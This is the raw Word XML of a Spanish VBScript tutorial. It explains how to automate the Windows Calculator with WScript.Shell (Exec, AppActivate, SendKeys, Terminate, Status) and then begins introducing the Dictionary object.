          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pero no es recomendable porque normalmente suelen cambiar (estoy pensando en el Word), aunque en otras como la Calculadora serviría.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4014" w:type="dxa"/>
        <w:tblInd w:w="-1" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4014"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="401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spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="33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Set VarApplicaion = ws.Exec("calc") Wscript.Sleep 5000 ws.AppActivate "Claculadora"</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En este caso, como el nombre de la ventana de la calculadora </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es siempre el mismo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, siempre funcion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Otra funcion </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">util y necesaria es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Terminate</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>finaliza el programa</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se ha abierto con la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Es relativamente fácil de usar, y se coloca siempre cuando ya no vayamos a utilizar más el programa, para que no se quede abierto. Siguiendo el siguiente modelo, que ejecuta la calculadora y al cabo de cinco segundos la cierra sin hacer nada má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Applicaion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.Exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("calc")</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Wscript.Sleep 500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Applicaion.Terminate</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La ultima función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es Status, esta devuelve un valor numérico, que</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se corresponde con 0, si la aplicación esta abierta, y se corresponde con 1, si esta cerrada</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Por tanto, esta función, unida a la</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sentencia If,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos puede ayudar a saber si el usuario del ordenador ha cerrado o no la aplicación que se intenta controlar. Un ejemplo de uso seria el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270"/>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Applicaion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.Exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("calc") Wscript.Sleep 1000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Applicaion.Status = 0 The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No has cerrado la Calculador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Applicaion.Terminate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="266"/>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Applicaion.Status = 1 The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Has cerrado la Calculadora"</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Aquí, abrimos la calculadora y tras esperarnos 10 segundos,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> comprobamos si la calculadora esta abierta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con VarApplicaion.Status, si lo esta, se muestra un mensaje y se cierra; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">si no, se muestra otro mensaje diferente. Esta función también se puede emplear para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>volver a iniciar todo el proceso de control sobre una aplicación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si el usuario la cierra, y no parar hasta conseguirlo.</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ara controlar una aplicación lo único que hay que hacer es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>unir ingeniosamente estas funciones con paciencia</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasta lograr lo que queremos hacer. Por poneros un ejemplo, dejo un Script que controla la Calculadora (se obvia la creación de variables):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="74" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="142" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="5650"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="27"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 et ws = WScript.CreateObject("WScript.Shell")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="290"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iable1=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MsgBox(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"Vamos a calcular cuanto vale la siguiente operacion: (43+21)x11",0,"Calculo")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="25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VarApp = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ws.Exec</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("calc")</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226" w:line="290" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2767" w:firstLine="0"/>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AppActivate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Calculadora" ws.SendKeys "43"</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226" w:line="290" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2409" w:firstLine="0"/>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AppActivate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> VarApp.ProcessID ws.SendKeys "{+}"</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226" w:line="290" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2409" w:firstLine="0"/>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AppActivate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> VarApp.ProcessID ws.SendKeys "21"</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226" w:line="290" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2767" w:firstLine="0"/>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AppActivate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Calculadora" ws.SendKeys "~"</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0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2409" w:firstLine="0"/>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AppActivate VarApp.ProcessID ws.SendKeys "*11"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="3390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
          </w:tcPr>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226" w:line="290" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4651" w:firstLine="0"/>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AppActivate</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Calculadora" ws.SendKeys "~"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="25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2500</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VarApp.Status = 0 Then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="290"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   Variable1=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MsgBox(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"Ahora ya lo sabes: ¡La Calculadora no miente!",0,"Calculo")    VarApp.Terminate</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="25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If</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VarApp.Status = 1 Then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="76" w:firstLine="0"/>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   Variable1=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MsgBox(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"¡Has cerrado la Calculadora! Pues ahora te quedas sin saberlo, mi mente no es capaz de hacerlo tan bien como ella...",0,"Calculo") End If</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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íjate bien y verás que todo es conforme lo explicado y que la operación la hace bien. Por ultimo decir que hay ciertas aplicaciones como por ejemplo el Word o el Outlook que se pueden controlar de otras formas más efectivas, pero esta, aunque larga y cansina de programar, siempre </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es la más espectacular y sirve para todo tipo de programas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Además, no es necesario que uses estas funciones solo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>para controlar aplicaciones: sabes lo que hacen, úsalas según mejor te convenga o necesites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="4"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programación con Objetos: Objeto Dictionary</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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objeto Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un objeto especial, ya que se encarga de crear una</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> forma nueva de administrar variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Las administra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>por pares</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (en Perl lo llaman matriz asociativa). Esto significa que en una variable crea una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>colección de valores</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>asocia a una clave</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para identificarlos. Por ejemplo, si tenemos la variable VarDic, nos podemos encontrar con est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a", "Atena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b", "Belgrado"</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c", "El Cair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Luego explicare las funciones y su significado, ahora quedaros con lo esencial. Digo que crea una colección porque la variable VarDic contiene a la vez los valores Atenas, Belgrado y El Cairo. Para que el Script sepa cual dar cada vez,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se le asignan una clave </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(como a, b,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De esa forma, VarDic funcionara como si tuviese el valor Atenas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuando se le especifique el valor</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a, funcionara como Belgrado cuando tenga b, y como El Cairo cuando c. Luego explicare como se especifica la clave y como se us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Este objeto tiene mucha utilidad cuando el Script es muy largo y tienes que utilizar muchas variables (con esto las puedes reducir drásticamente), o bien cuando quieres agruparlas porque tienen algo en común (al estilo de las estructuras de C++). Ahora voy a explicar un poco como se utiliza. Pongamos otro ejempl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 xml:space="preserve">Add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Add</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">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Add</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> "padre", "Pepe"</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rimero tenemos la variable VarDic, a la que le </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
